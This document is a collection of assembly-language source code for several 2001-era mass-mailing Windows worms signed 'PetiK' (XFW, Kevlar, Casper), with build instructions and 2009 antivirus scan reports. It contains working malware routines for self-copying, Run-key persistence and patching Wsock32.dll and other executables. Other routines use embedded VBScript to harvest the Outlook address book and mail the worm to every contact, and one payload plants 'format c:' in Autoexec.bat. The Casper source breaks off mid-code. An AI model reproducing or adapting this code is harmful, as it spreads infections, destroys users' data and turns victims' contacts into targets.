        callx   lstrcmp
        test    eax,eax
        jz      INF_DLL
COPIE:  push    00h
        push    offset szCopie            ; copy to \SYSTEM\Services.exe
        push    offset szOrig
        callx   CopyFileA
W_INI:  push    50
        push    offset Winini
        callx   GetWindowsDirectoryA
        @pushsz "\\WIN.INI"
        push    offset Winini
        callx   lstrcat
        push    offset Winini
        push    offset szCopie
        @pushsz "run"
        @pushsz "windows"
        callx   WritePrivateProfileStringA

WSOCK:  push    50
        mov     edi,offset a_wsck
        push    edi
        callx   GetSystemDirectoryA
        test    eax,eax
        jz      FIN
        add     edi,eax
        mov     eax,"OSW\"                ; search \SYSTEM\Wsock32.dll
        stosd
        mov     eax,"23KC"
        stosd
        mov     eax,"LLD."
        stosd
        xor     eax,eax
        stosd
        push    offset a_wsck
        push    offset n_wsck
        callx   lstrcat                   ; to become \SYSTEM\Wsock32
        mov     esi,offset n_wsck
        push    esi
        callx   lstrlen
        add     esi,eax
        sub     esi,4
        mov     [esi],"KTP."              ; and \SYSTEM\Wsock32.ptk
        push    01h
        push    offset n_wsck
        push    offset a_wsck
        callx   CopyFileA
        test    eax,eax
        jz      FIN
        xor     eax,eax
        push    eax
        push    eax
        push    03h
        push    eax
        push    eax
        push    80000000h or 40000000h
        push    offset a_wsck
        callx   CreateFileA
        inc     eax
        jz      FIN
        dec     eax
        mov     WsckHdl,eax
        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    04h                       ; PAGE_READWRITE
        push    eax
        push    WsckHdl
        callx   CreateFileMappingA
        test    eax,eax
        jz      FIN2
        mov     WsckMap,eax
        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    06h                       ; SECTION_MAP_WRITE or READ
        push    WsckMap
        callx   MapViewOfFile
        test    eax,eax
        jz      FIN3
        mov     WsckView,eax
        mov     esi,eax
        cmp     byte ptr [esi+12h],"P"    ; already marked ?
        je      FIN3
        mov     word ptr [esi+12h],"eP"   ; write "PetiK" at offset 12h
        mov     word ptr [esi+14h],"it"
        mov     byte ptr [esi+16h],"K"
FIN4:   push    WsckView
        callx   UnmapViewOfFile
FIN3:   push    WsckMap
        callx   CloseHandle
FIN2:   push    WsckHdl
        callx   CloseHandle

F_MESS: push    10h
        @pushsz "Loader Error"
        @pushsz "This program will be terminated"
        push    00h
        callx   MessageBoxA
TOOLS:  pushad
        push    50
        push    offset windir
        callx   GetWindowsDirectoryA
        @pushsz "\Tool_PetiK.txt"
        push    offset windir
        callx   lstrcat
        push    00h
        push    01h or 20h
        push    02h
        push    00h
        push    01h
        push    40000000h
        push    offset windir
        callx   CreateFileA
        mov     edi,eax
        push    00h
        push    offset octets
        push    TXTSIZE
        push    offset txtd
        push    edi
        callx   WriteFile
        push    edi
        callx   CloseHandle
        popad
        jmp     FIN

INF_DLL:
D_INF:  push    50
        push    offset szCurFolder
        callx   GetCurrentDirectoryA
        push    offset szCurFolder
        callx   SetCurrentDirectoryA
FFF:    push    offset Search
        @pushsz "*.dll"                   ; search all DLL files
        callx   FindFirstFileA
        inc     eax
        je      F_INF
        dec     eax
        mov     [htmlHdl],eax
i_file: pushad
        mov     edi,offset Search.cFileName
        push    edi
        callx   lstrlen
        add     edi,eax
        mov     eax,"EXE."                ; and add .EXE => file.dll.exe
        stosd
        xor     eax,eax
        stosd
        push    01h
        push    offset Search.cFileName
        push    offset szOrig
        callx   CopyFileA                 ; and copies with the main worm
        test    eax,eax
        jz      S_P
        push    offset Search
        push    [htmlHdl]
        callx   FindNextFileA
        test    eax,eax
        jne     i_file
FC:     push    [htmlHdl]
        callx   FindClose
        popad
F_INF:
S_P:
        push    offset RegHandle
        push    01h
        push    00h
        @pushsz "Software\Microsoft\Internet Explorer\Main"
        push    80000001h
        callx   RegOpenKeyExA
        test    eax,eax
        jnz     FIN
        push    offset PageSize
        push    offset Page
        push    offset ValueType
        push    00h
        @pushsz "Start Page"
        push    RegHandle
        callx   RegQueryValueExA
        push    [RegHandle]
        callx   RegCloseKey
        @pushsz "http://www.whitesonly.net"
        push    offset Page
        callx   lstrcmp
        test    eax,eax
        jz      FORMAT
        @pushsz "http://www.kkk.com"
        push    offset Page
        callx   lstrcmp
        test    eax,eax
        jz      FORMAT
        @pushsz "http://www.front-national.fr"
        push    offset Page
        callx   lstrcmp
        test    eax,eax
        jz      FORMAT
        @pushsz "http://www.lepen-tv.com"
        push    offset Page
        callx   lstrcmp
        test    eax,eax
        jz      FORMAT
        @pushsz "http://www.hammerskins.com"
        push    offset Page
        callx   lstrcmp
        test    eax,eax
        jz      FORMAT
        jmp     INET

FORMAT: pushad
        push    00h
        push    20h
        push    02h
        push    00h
        push    01h
        push    40000000h
        @pushsz "C:\Autoexec.bat"
        callx   CreateFileA
        mov     edi,eax
        push    00h
        push    offset octets
        push    BATSIZE
        push    offset batd
        push    edi
        callx   WriteFile
        push    edi
        callx   CloseHandle
        popad
        jmp     FIN

INET:   @pushsz "WININET.dll"
        callx   LoadLibraryA
        test    eax,eax
        jz      FIN
        mov     WNEThdl,eax
        @pushsz "InternetCheckConnectionA"
        push    WNEThdl
        callx   GetProcAddress
        test    eax,eax
        jz      FIN
        mov     netcheck,eax
VNET:   xor     eax,eax
        push    eax
        push    eax
        push    eax
        call    [netcheck]
        xchg    eax,ecx
        jecxz   VNET
FNET:   push    [WNEThdl]
        callx   FreeLibrary
        push    40h
        @pushsz "Internet"
        @pushsz "You're connected"
        push    00h
        callx   MessageBoxA
VBS:    pushad
        push    00h
        push    80h
        push    02h
        push    00h
        push    01h
        push    40000000h
        @pushsz "C:\Win.vbs"
        callx   CreateFileA
        mov     edi,eax
        push    00h
        push    offset octets2
        push    VBSSIZE
        push    offset vbsd
        push    edi
        callx   WriteFile
        push    edi
        callx   CloseHandle
        popad
        push    01h
        @pushsz "wscript C:\Win.vbs"
        callx   WinExec
        push    30 * 1000
        @pushsz "C:\Win.vbs"
        callx   DeleteFileA
FIN:    push    00h
        callx   ExitProcess

.data
; ========== INSTALLATION ==========
a_wsck      db 50 dup (0)
n_wsck      db 50 dup (0)
szCopie     db 50 dup (0)
szOrig      db 50 dup (0)
Winini      db 50 dup (0)
windir      db 50 dup (0)
octets      dd ?
; ============ INFECTION 1 ===========
WsckHdl     dd ?
filesize    dd ?
WsckMap     dd ?
WsckView    dd ?
; ============ INFECTION 2 ===========
htmlHdl     dd ?
szCurFolder db 50 dup (0)
; =============== EMail ==============
RegHandle   dd ?
Page        db 7Fh dup (0)
PageSize    dd 7Fh
ValueType   dd 0
WNEThdl     dd ?
netcheck    dd ?
octets2     dd ?
WormName    db "I-Worm.XFW coded by PetiK (c)2001 "
Origine     db "Made In France",00h
txtd        db "To restore Wsock32.dll :",13,10
            db "extract /a D:\WIN98\precopy1.cab wsock32.dll /L C:\WINDOWS\SYSTEM",00h
TXTSIZE     equ $-txtd
batd        db "echo y | format c: /U /V:FuckYou"
BATSIZE     equ $-batd

SYSTIME struct
  wYear         WORD ?
  wMonth        WORD ?
  wDayOfWeek    WORD ?
  wDay          WORD ?
  wHour         WORD ?
  wMinute       WORD ?
  wSecond       WORD ?
  wMillisecond  WORD ?
SYSTIME ends

MAX_PATH equ 260

FILETIME struct
  dwLowDateTime   dd ?
  dwHighDateTime  dd ?
FILETIME ends

WIN32_FIND_DATA struct
  dwFileAttributes   dd ?
  ftCreationTime     FILETIME ?
  ftLastAccessTime   FILETIME ?
  ftLastWriteTime    FILETIME ?
  nFileSizeHigh      dd ?
  nFileSizeLow       dd ?
  dwReserved0        dd ?
  dwReserved1        dd ?
  cFileName          db MAX_PATH dup (?)
  cAlternateFileName db 13 dup (?)
                     db 3 dup (?)
WIN32_FIND_DATA ends

SystemTime SYSTIME <>
Search     WIN32_FIND_DATA <>

vbsd:   db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
        db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
        db 'For Each M In L.AddressLists',0dh,0ah
        db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
        db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
        db 'Set P = M.AddressEntries(O)',0dh,0ah
        db 'Set N = K.CreateItem(0)',0dh,0ah
        db 'N.To = P.Address',0dh,0ah
        db 'N.Subject = "Xtra game for you"',0dh,0ah
        db 'N.Body = "This is for you"',0dh,0ah
        db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
        db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"Services.exe")',0dh,0ah
        db 'N.DeleteAfterSubmit = True',0dh,0ah
        db 'If N.To <> "" Then',0dh,0ah
        db 'N.Send',0dh,0ah
        db 'End If',0dh,0ah
        db 'Next',0dh,0ah
        db 'End If',0dh,0ah
        db 'Next',0dh,0ah
VBSSIZE equ $-vbsd

end DEBUT

File XFW.exe received on 05.16.2009 20:03:58 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result VBS.Lee.Based!IK Win32/PetTick.5632 Worm/Petik.D1 Worm/Win32.Win32 W32/Malware!e65e Win32:XFW I-Worm/Petik Generic.Malware.Msp!.D18236D7 Worm.Petik.D2 Worm.Win32.Petik.AB Win32.Petik.8192 Suspicious File Win32/Petik.5632.C!intended W32/Malware!e65e Email-Worm.Win32.Petik W32/Petik!worm Generic.Malware.Msp!.D18236D7 VBS.Lee.Based Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!CA27691BF213 Worm.Petik.D1 Worm:Win32/Pet_tik.F Win32/Petik.AB W32/Petik.AC Worm/W32.Petik.5632 W32/Petik.D I-Worm.Petxfw.A Medium Risk Malware Worm.XFW W32/XfW Worm.Petik W95.Pet_Tick.gen WORM_PETIK.F Win32.Worm.Petik.8192 I-Worm.Win32.PetTick.5632 I-Worm.Petxfw.A

Additional information
File size: 5632 bytes
MD5...: ca27691bf2137dc610588dd9f09de3b2
SHA1..: 5b1aac1f8783d4123f3b88c213bc8321dc8d6a4a
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

comment #
Name     : I-Worm.Kevlar
Author   : PetiK
Date     : August 7th - August 16th
Language : ASM
Size     : 5120 byte
Action   :
 * Copy itself to %System%\Kevlar32.exe (hidden attribute) and %System%\MScfg32.exe (normal attribute)
 * Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe
 * Infect %Windir%\C???????.exe file on writing "PetiK" in the file
 * Infect %Windir%\*.exe : it adds .htm and creates a new file with ActiveX
 * Create C:\__.vbs. This file takes all addresses in the Address Book and saves them in %windir%\AddBook.txt. The worm scans this file to find the addresses and sends a new mail.

Subject : Windows Protect !!
Body : The smallest software to stop your computer to bug in each time. I have found this program on WWW.KEVLAR-PROTECT.COM Take a look at the attchment. Bye and have a nice day.
Attachment : MScfg32.exe
 * It creates the %windir%\MSinfo32.txt. It looks like this :
   [File Infected] => Name of C???????.exe file infected
   CLEANMGR.EXE=Infected by W32.Kevlar.PetiK
   CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK
   [EMail saved] => Some address found in the address book
   first@mail.com=Next victim
   second@mail.com=Next victim

To build the worm:
 tasm32 /M /ML Kevlar
 tlink32 -Tpe -aa -x Kevlar,,,import32
 upx -9 Kevlar.exe

To delete the worm:
 @echo off
 del %windir%\system\Kevlar32.exe
 del %windir%\system\MScfg32.exe
 del %windir%\*.exe.htm
 del %windir%\MSinfo32.txt
 del %windir%\AddBook.txt
#

.586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc DEBUT: F_NAME: mov push push callx mov push push push push 50 esi,offset Orig esi 0 GetModuleFileNameA edi,offset CopyName2 edi 50 edi

callx add mov stosd mov stosd mov stosd pop push push push callx mov push push push callx add mov stosb mov stosd mov stosd mov stosd pop push callx cmp je push push push callx

GetSystemDirectoryA edi,eax eax,'cSM\' eax,'23gf' eax,'exe.' edi 0 edi esi CopyFileA edi,offset CopyName edi 50 edi GetSystemDirectoryA edi,eax al,'\' eax,'lveK' eax,'23ra' eax,'exe.' edi esi GetFileAttributesA eax,1 SUITE 0 edi esi CopyFileA

push 01h push edi callx SetFileAttributesA REG: pushad @pushsz "SHLWAPI.dll" callx LoadLibraryA test eax,eax jz FIN mov edi,eax @pushsz "SHSetValueA" push edi callx GetProcAddress test eax,eax jz FIN mov esi,eax push 08h push offset CopyName push 01h @pushsz "Kevlar32" @pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" push 80000002h call esi push edi callx FreeLibrary popad call Nick

mov edi,offset nickname push 40h @pushsz "Hello, my name is :" push edi push 0 callx MessageBoxA call Infect

jmp

FIN

SUITE: call Infect2 VB_F: pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\__.vbs" callx CreateFileA test eax,eax xchg edi,eax push 00h push offset octets push VBSSIZE push offset vbsd push edi callx WriteFile push edi callx CloseHandle popad push 1 @pushsz "wscript C:\__.vbs" callx WinExec push 10000 callx Sleep @pushsz "C:\__.vbs" callx DeleteFileA SCAN1: push push push callx add mov stosd mov stosd mov stosd xor stosd call FIN: mov edi,offset addbook edi 50 edi GetWindowsDirectoryA edi,eax eax,"ddA\" eax,"kooB" eax,"txt." eax,eax OPEN

push 00h callx ExitProcess Nick Proc mov edi,offset nickname callx GetTickCount push 9 pop ecx xor edx,edx div ecx inc edx mov ecx,edx name_g: push ecx callx GetTickCount push 'Z'-'A' pop ecx xor edx,edx div ecx xchg eax,edx add al,'A' stosb callx GetTickCount push 100 pop ecx xor edx,edx div ecx push edx callx Sleep pop ecx

loop ret Nick

name_g EndP

Infect Proc pushad push 50 push offset WinPath callx GetWindowsDirectoryA push offset WinPath callx SetCurrentDirectoryA FFF: push offset Search @pushsz "C???????.exe" callx FindFirstFileA inc eax je F_INF dec eax mov [exeHdl],eax I_FILE: mov verif,0 xor eax,eax push eax push eax push 03h push eax push eax push 80000000h or 40000000h push offset Search.cFileName callx CreateFileA inc eax jz FNF dec eax xchg eax,ebx xor push push push push push push callx test jz xchg xor push push push push push callx test jz xchg mov cmp jne cmp jne cmp jne cmp je mov mov mov inc push callx CL2: push callx CL1: push eax,eax eax eax eax 04h eax ebx CreateFileMappingA eax,eax CL1 eax,ebp eax,eax eax eax eax 06h ebp MapViewOfFile eax,eax CL2 eax,edi esi,eax word ptr [esi],"ZM" CL2 byte ptr [esi+18h],"@" CL2 word ptr [esi+80h],"EP" CL2 byte ptr [esi+12h],"P" CL2 word ptr [esi+12h],"eP" word ptr [esi+14h],"it" byte ptr [esi+16h],"K" verif edi UnmapViewOfFile ebp CloseHandle ebx

callx CloseHandle cmp verif,1 jne FNF mov edi,offset InfoFile push edi push 50 push edi callx GetWindowsDirectoryA add edi,eax mov eax,'iSM\' stosd mov eax,'3ofn' stosd mov eax,'xt.2' stosd mov al,'t' stosb pop edi mov esi,edi push esi @pushsz "Infected by W32.Kevlar.PetiK" push offset Search.cFileName @pushsz "File Infected" callx WritePrivateProfileStringA FNF: push offset Search push [exeHdl] callx FindNextFileA test eax,eax jne I_FILE FC: push [exeHdl] callx FindClose F_INF: popad ret Infect EndP Infect2 Proc pushad push 50 push offset WinPath callx GetWindowsDirectoryA push offset WinPath callx SetCurrentDirectoryA FFF2: push offset Search @pushsz "*.exe" callx FindFirstFileA inc eax je F_INF2 dec eax mov [exeHdl],eax I_FILE2: pushad mov edi,offset Search.cFileName push edi callx lstrlen add edi,eax mov eax,"mth." stosd xor eax,eax stosd push 00h push 80h push 02h push 00h push 01h push 40000000h push offset Search.cFileName callx CreateFileA test eax,eax xchg ebp,eax push 00h push offset octets push HTMSIZE

push offset htmd push ebp callx WriteFile push ebp callx CloseHandle popad FNF2: push offset Search push [exeHdl] callx FindNextFileA test eax,eax jne I_FILE2 FC2: push [exeHdl] callx FindClose F_INF2: popad ret Infect2 EndP OPEN: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset addbook callx CreateFileA inc eax je NO dec eax xchg eax,ebx xor push push push push push push callx test je xchg xor push push push push push callx test je xchg push push callx cmp jbe call F3: F2: F1: NO: push callx push callx push callx popad ret eax,eax eax eax eax 02h eax ebx CreateFileMappingA eax,eax F1 eax,ebp eax,eax eax eax eax 04h ebp MapViewOfFile eax,eax F2 eax,esi 00h ebx GetFileSize eax,03h F3 SCAN esi UnmapViewOfFile ebp CloseHandle ebx CloseHandle

; is the file empty ??

SCAN: pushad xor edx,edx mov edi,offset m_addr

push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"!" je f_mail cmp al,"@" je not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je SCAN call SEND_MAIL jmp SCAN entr2: xor al,al stosb pop edi jmp SCAN f_mail: popad ret SEND_MAIL: push 50 push offset save_addr callx GetWindowsDirectoryA @pushsz "\MSinfo32.txt" push offset save_addr callx lstrcat push offset save_addr @pushsz "Next victim" push offset m_addr @pushsz "EMail saved" callx WritePrivateProfileStringA xor eax,eax push eax push eax push offset Message push eax push [MAPIHdl] callx MAPISendMail ret

.data ; ===== INSTALLATION ===== Orig db 50 dup (0) CopyName db 50 dup (0) CopyName2 db 50 dup (0) nickname db 11 dup (?) ; ===== INFECTION ===== InfoFile db 50 dup (0) WinPath db 50 dup (0) exeHdl dd ? verif dd ? octets dd ? ; ===== MAIL ===== addbook db 50 dup (0) save_addr db 50 dup (0) m_addr db 128 dup (?) MAPIHdl dd 0 subject db "Windows Protect !!",00h body db "The smallest software to stop your computer to bug in each time.",0dh,0ah db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah db "Take a look at the attchment.",0dh,0ah,0dh,0ah db 09h,09h,"Bye and have a nice day.",00h

NameFrom Message

db "Your friend",00h dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd ? offset offset ? ? ? 2 offset 1 offset 1 offset

subject body

MsgFrom MsgTo Attach

MsgFrom

? ? NameFrom ? ? ? ? 1 offset m_addr offset m_addr ? ? ? ? ? offset CopyName2 ? ?

MsgTo

Attach

htmd: db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah db '<script language=vbscript>',0dh,0ah db 'on error resume next',0dh,0ah db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah db 'If err.number=429 then',0dh,0ah db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>' db 'You need ActiveX enabled to see this file<br><a href=''javascript:location.reload()''>' db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah db 'Else',0dh,0ah db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah db 'document.write "<font face=''verdana'' size=''3'' color=red>' db 'This page is generate by a worm<br>But this worm is proteced by Kevlar<br></font>"',0dh,0ah db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>' db 'Worms are not dangerous for your computer but to survive, they must be strong</font>"',0dh,0ah db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"',0dh,0ah db 'End If',0dh,0ah db '</script></html>',00h HTMSIZE = $-htmd vbsd: db 'On Error Resume Next',0dh,0ah db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah db 'c.Close',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah db 'c.WriteLine P.Address',0dh,0ah db 'c.Close',0dh,0ah db 'Next',0dh,0ah

db 'End If',0dh,0ah db 'Next',0dh,0ah db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah db 'c.WriteLine "!"',0dh,0ah db 'c.Close',0dh,0ah VBSSIZE = $-vbsd signature db "I-Worm.Kevlar coded by PetiK (c)2001",00h equ 260 struct dd ? dd ? ends struct dd ? FILETIME ? FILETIME ? FILETIME ? dd ? dd ? dd ? dd ? dd MAX_PATH (?) db 13 dup (?) db 3 dup (?) ends

MAX_PATH FILETIME dwLowDateTime dwHighDateTime FILETIME WIN32_FIND_DATA dwFileAttributes ftCreationTime ftLastAccessTime ftLastWriteTime nFileSizeHigh nFileSizeLow dwReserved0 dwReserved1 cFileName cAlternateFileName WIN32_FIND_DATA Search end DEBUT end

WIN32_FIND_DATA <>

File Kevlar.exe received on 05.16.2009 17:43:00 (CET)

Antivirus          Version         Last Update   Result
a-squared          4.0.0.101       2009.05.16    Email-Worm.Win32.Petik!IK
AhnLab-V3          5.0.0.2         2009.05.16    Win32/PetTick.5120
AntiVir            7.9.0.168       2009.05.15    Worm/Petik.Kev
Antiy-AVL          2.0.3.1         2009.05.15    Worm/Win32.Win32
Authentium         5.1.2.4         2009.05.16    W32/Malware!c6f1
Avast              4.8.1335.0      2009.05.15    Win32:Kevlar
AVG                8.5.0.336       2009.05.15    I-Worm/Petik.H
BitDefender        7.2             2009.05.16    Generic.Malware.GSMsp!.411C2399
CAT-QuickHeal      10.00           2009.05.15    W32.Petik
ClamAV             0.94.1          2009.05.16    Win32.Pet_Tick.M
Comodo             1157            2009.05.08    Worm.Win32.Petik.L
DrWeb              5.0.0.12182     2009.05.16    Win32.Petik.8192
eSafe              7.0.17.0        2009.05.14    Suspicious File
eTrust-Vet         31.6.6508       2009.05.16    Win32/Kevlar
F-Prot             4.4.4.56        2009.05.16    W32/Malware!c6f1
F-Secure           8.0.14470.0     2009.05.15    Email-Worm.Win32.Petik
Fortinet           3.117.0.0       2009.05.16    JS/KEVLAR.A
GData              19              2009.05.16    Generic.Malware.GSMsp!.411C2399
Ikarus             T3.1.1.49.0     2009.05.16    Email-Worm.Win32.Petik
K7AntiVirus        7.10.737        2009.05.16    Email-Worm.Win32.Petik
Kaspersky          7.0.0.125       2009.05.16    Email-Worm.Win32.Petik
McAfee             5616            2009.05.15    W32/PetTick@MM
McAfee+Artemis     5616            2009.05.15    Artemis!95EC22B0B688
McAfee-GW-Edition  6.7.6           2009.05.15    Worm.Petik.Kev
Microsoft          1.4602          2009.05.16    Worm:Win32/Petick.M@mm
NOD32              4080            2009.05.15    Win32/Petik.L
Norman             6.01.05         2009.05.16    W32/Pet_Tick.5120
nProtect           2009.1.8.0      2009.05.16
Panda              10.0.0.14       2009.05.16    W32/Petik.C
PCTools            4.4.2.0         2009.05.16    I-Worm.Petik.I1
Prevx              3.0             2009.05.16    Medium Risk Malware
Rising             21.29.52.00     2009.05.16    Trojan.Petik
Sophos             4.41.0          2009.05.16    W32/Kevlar
Sunbelt            3.2.1858.2      2009.05.16    Worm.Petik
Symantec           1.4.4.12        2009.05.16    W32.Pet_Tick.M
TheHacker          6.3.4.1.326     2009.05.15
TrendMicro         8.950.0.1092    2009.05.15    WORM_PET.TICK.M
VBA32              3.12.10.5       2009.05.16    Win32.Worm.Petik.8192
ViRobot            2009.5.15.1737  2009.05.15    I-Worm.Win32.Petik.5120
VirusBuster        4.6.5.0         2009.05.16    I-Worm.Petik.I1

Additional information
File size: 5120 bytes
MD5...: 95ec22b0b68815a9bf6def95e5c3b9b1
SHA1..: 00dbadea4b400e6e0ae58951d063a4943fd1fc8d
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

comment #
Name   : I-Worm.Casper
Author : PetiK
Date   : August 17th - August 24th
Size   : 6144 byte (compressed with UPX tool)
Action :
 * Copy itself to WINDOWS\MsWinsock32.exe
 * Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value Winsock32 1.0 = WINDOWS\MsWinsock32.exe

To build the worm:
 tasm32 /ml /m9 Casper
 tlink32 -Tpe -c -x -aa Casper,,,import32,dllz
 upx -9 Casper.exe

To delete the worm:
 del %windir%\MsWinsock32.exe
 del %windir%\CasperEMail.txt

dllz.def file:
 IMPORTS
 WININET.InternetGetConnectedState
 SHLWAPI.SHSetValueA
#

.586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc DEBUT: Main_Worm: call call call call Hide_Worm Copy_Worm Check_Wsock Prepare_Spread_Worm

Connected_: push 00h push offset Tmp callx InternetGetConnectedState dec eax jnz Connected_ mov push push push callx add mov stosd mov stosd mov stosd mov stosd xor stosd call edi,offset casper_mail edi 50 edi GetWindowsDirectoryA edi,eax eax,"saC\" eax,"Erep" eax,"liaM" eax,"txt." eax,eax Spread_Worm

Hide_Worm proc

pushad @pushsz "Kernel32.dll" callx GetModuleHandleA xchg eax,ecx jecxz End_Hide @pushsz "RegisterServiceProcess" push ecx callx GetProcAddress xchg eax,ecx jecxz End_Hide push 1 push 0 call ecx End_Hide: popad ret Hide_Worm endp Check_Wsock proc Search_Wsock: push 50 mov edi,offset wsock_file push edi callx GetSystemDirectoryA add edi,eax mov eax,"osW\" stosd mov eax,"23kc" stosd mov eax,"lld." stosd xor eax,eax stosd push callx cmp jne xor push push push push push push push callx mov offset wsock_file GetFileAttributesA eax,20h End_Wsock eax,eax eax eax 03h eax eax 80000000h or 40000000h offset wsock_file CreateFileA wsckhdl,eax

File_Mapping: xor eax,eax push eax push eax push eax push 04h push eax push wsckhdl callx CreateFileMappingA test eax,eax jz Close_File mov wsckmap,eax xor push push push push push callx test jz mov mov eax,eax eax eax eax 06h wsckmap MapViewOfFile eax,eax Close_Map_File esi,eax wsckview,eax

Old_Infect: mov verif,0 cmp word ptr [esi],"ZM"

jne cmp je cmp je jmp

UnmapView_File byte ptr [esi+12h],"z" Infected_By_Happy word ptr [esi+38h],"ll" Infected_By_Icecubes UnmapView_File

Infected_By_Happy: push 10h push offset warning @pushsz "I-Worm.Happy coded by Spanska" push 00h callx MessageBoxA inc verif jmp UnmapViewOfFile Infected_By_Icecubes: push 10h push offset warning @pushsz "I-Worm.Icecubes coded by f0re" push 00h callx MessageBoxA inc verif jmp UnmapViewOfFile Already_Infected: inc verif jmp UnmapViewOfFile UnmapView_File: push wsckview callx UnmapViewOfFile Close_Map_File: push offset wsckmap callx CloseHandle Close_File: push wsckhdl callx CloseHandle End_Wsock: ret Check_Wsock endp Copy_Worm proc pushad Original_Name: push 50 mov esi,offset original push esi push 0 callx GetModuleFileNameA Copy_Name: mov edi,offset copy_name push edi push 50 push edi callx GetWindowsDirectoryA add edi,eax mov eax,'WsM\' stosd mov eax,'osni' stosd mov eax,'23kc' stosd mov eax,'exe.' stosd pop edi push 0 push edi push esi callx CopyFileA Reg_Registered: push 08h push edi push 01h @pushsz "Winsock32" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h callx SHSetValueA

push 08h @pushsz "PetiK - France - (c)2001" push 01h @pushsz "Author" @pushsz "Software\CasperWorm" push 80000001h callx SHSetValueA push 08h @pushsz "1.00" push 01h @pushsz "Version" @pushsz "Software\CasperWorm" push 80000001h callx SHSetValueA popad ret Copy_Worm endp Prepare_Spread_Worm proc pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\CasperMail.vbs" callx CreateFileA xchg edi,eax push 00h push offset octets push VBSSIZE push offset vbsd push edi callx WriteFile push edi callx CloseHandle push 1 @pushsz "wscript C:\CasperMail.vbs" callx WinExec push 3 * 1000 callx Sleep @pushsz "C:\CasperMail.vbs" callx DeleteFileA popad ret Prepare_Spread_Worm endp Spread_Worm: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset casper_mail callx CreateFileA inc eax test eax,eax je End_Spread_worm dec eax xchg eax,ebx xor push push push push push push callx test je xchg xor eax,eax eax eax eax 02h eax ebx CreateFileMappingA eax,eax F1 eax,ebp eax,eax

push push push push push callx test je xchg push push callx cmp jbe call

eax eax eax 04h ebp MapViewOfFile eax,eax F2 eax,esi 00h ebx GetFileSize eax,03h F3 Scan_Mail

